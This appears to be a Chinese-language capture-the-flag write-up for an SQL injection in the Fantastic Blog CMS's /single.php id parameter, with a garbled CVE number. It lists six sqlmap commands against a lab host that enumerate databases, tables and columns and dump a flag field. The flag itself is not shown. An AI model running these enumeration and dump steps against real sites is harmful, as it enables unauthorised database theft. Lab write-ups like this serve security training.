100字范文,内容丰富有趣,生活中的好帮手!
100字范文 > CVE--28512 Fantastic Blog CMS 存在SQL注入漏洞

CVE--28512 Fantastic Blog CMS 存在SQL注入漏洞

时间:2018-11-07 00:16:29

相关推荐

CVE--28512 Fantastic Blog CMS 存在SQL注入漏洞

靶标介绍:

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。

根据题目提示,找到注入点

http://eci-2zedcqv70l1j4fp9hdfc./single.php?id=2

直接用sqlmap注入

1. 检查注入点:

​sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc./single.php?id=2

2. 爆所有数据库信息:

sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc./single.php?id=2 --dbs

3. 爆当前数据库信息:

sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc./single.php?id=2 --current-db

4. 指定库名列出所有表

sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc./single.php?id=2 -D ctf --tables

'ctf' 为指定数据库名称

5. 指定库名表名列出所有字段

sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc./single.php?id=2 -D ctf -T flag --columns

'flag' 为指定表名称

6. 指定库名表名字段dump出指定字段

sqlmap -u http://eci-2zedcqv70l1j4fp9hdfc./single.php?id=2 -D ctf -T flag -C flag --dump

'flag' 为指定字段名称

flag如下:

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。